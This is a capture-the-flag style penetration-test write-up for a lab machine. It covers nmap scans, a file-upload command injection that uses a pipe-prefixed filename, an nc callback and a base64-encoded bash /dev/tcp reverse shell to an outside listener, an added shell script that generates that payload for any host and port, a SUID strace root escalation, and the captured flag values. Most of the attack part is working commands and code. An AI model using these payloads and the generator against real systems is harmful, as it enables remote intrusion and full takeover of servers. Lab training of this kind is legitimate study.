Enum
sudo nmap -T4 -A -v -oN nmap --min-rate 1000 $IP
sudo nmap -T4 --script=vuln -v -oN vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -oN alltcp --min-rate 1000 $IP
sudo nmap -T4 -sU -sV -sC -v --top-ports 100 -oN udp --min-rate 1000 $IP   # original had a bare -p with no port list; top 100 UDP ports assumed here
sudo nmap -A -v -p- -oN alltcpslow $IP
Services
22 ssh
80 http
http
Thoughts
First read of "magic" on the page: magic bytes, so the upload filter is probably checking those. Plan: patch the magic bytes on a PHP revshell, upload, exec to bypass.
Actually you can just change the file extension.
That was NOT it.
Lesson: search the project's GitHub issues for the exact version string it leaks.
Can trigger with:
cp test.png '|exec"`nc 192.168.45.171 80`".png'
Upload and check the listener on 192.168.45.171:80.
We got command exec: a filename starting with | gets handed to a shell by the target, and the backtick substitution runs nc before exec ever sees an argument.
The real reverse shell needs encoding: the bash /dev/tcp one-liner contains /, which a filename cannot hold, so base64 it and let the filename decode it straight into bash.
cp test.png '|rev"`echo MDwmMTk2O2V4ZWMgMTk2PD4vZGV2L3RjcC8xOTIuMTY4LjQ1LjE3MS80MjA2OTsgc2ggPCYxOTYgPiYxOTYgMj4mMTk2 | base64 -d | bash`".png'
(the base64 decodes to: 0<&196;exec 196<>/dev/tcp/192.168.45.171/42069; sh <&196 >&196 2>&196)
We got a shell back.
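Added example, not part of the original notes: a small POSIX shell script that builds the pipe-filename payload above for any listener address and port, so the base64 step does not have to be redone by hand, and checks that the result is actually usable as a filename. It assumes only what the notes observed, that the target runs whatever follows a leading | in the filename through a shell; the host and port values are placeholders, and stage_payload is a helper name chosen here.

```shell
#!/bin/sh
# Added example (not from the write-up). Builds the "|cmd" filename payload used
# above for an arbitrary listener, with the reverse shell base64-wrapped so the
# filename never contains '/', which a filename cannot hold.
# Assumes the target runs the text after a leading '|' through a shell, as seen
# on this box. LHOST/LPORT arguments are placeholders.

# Bash /dev/tcp reverse shell. fd 196 is arbitrary, same as the page's payload.
build_revshell() {
    lhost="$1"; lport="$2"
    printf '0<&196;exec 196<>/dev/tcp/%s/%s; sh <&196 >&196 2>&196' "$lhost" "$lport"
}

# base64 with no line wrapping and no trailing newline, so it stays one shell word
# inside the filename (GNU base64 wraps at 76 chars by default).
encode_b64() {
    printf '%s' "$1" | base64 | tr -d '\n'
}

# The filename: the leading '|' makes the target popen the rest. `rev` is a
# throwaway command whose double-quoted "argument" is a backtick substitution,
# so the decoded reverse shell runs before rev does anything. The ".png" suffix
# keeps the upload looking like an image.
build_payload_filename() {
    b64=$(encode_b64 "$(build_revshell "$1" "$2")")
    printf '|rev"`echo %s | base64 -d | bash`".png' "$b64"
}

# A filename may not contain '/', and a single quote would break the cp quoting
# used in the notes. Returns 0 if the string is usable as a filename, 1 otherwise.
check_filename() {
    case "$1" in
        */*|*\'*) return 1 ;;
    esac
    return 0
}

# Copy a valid image under the payload name, ready to upload, and print the name.
# Usage: stage_payload test.png 192.168.45.171 42069   (listener: nc -lvnp 42069)
stage_payload() {
    name=$(build_payload_filename "$2" "$3")
    check_filename "$name" || { echo "payload is not filename-safe" >&2; return 1; }
    cp "$1" "$name" && printf '%s\n' "$name"
}
```

The raw /dev/tcp one-liner fails check_filename because of the slashes in /dev/tcp/..., which is exactly why the notes switched to base64; the encoded filename passes, and with the page's own host and port the script reproduces the page's payload byte for byte.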
SUID
find / -perm -u=s -type f 2>/dev/null
/usr/bin/strace
strace is SUID root, so run a shell under it (the standard GTFOBins strace escape). -o /dev/null discards the trace output; -p stops sh from dropping the root effective uid it inherits.
/usr/bin/strace -o /dev/null /bin/sh -p
www-data@image:/var/www/html$ /usr/bin/strace -o /dev/null /bin/sh -p
#
local
ab530f963f7745bbf96b0c8991a4b936
proof
83e8c7fe7814154b3c6e6beafaa43c6a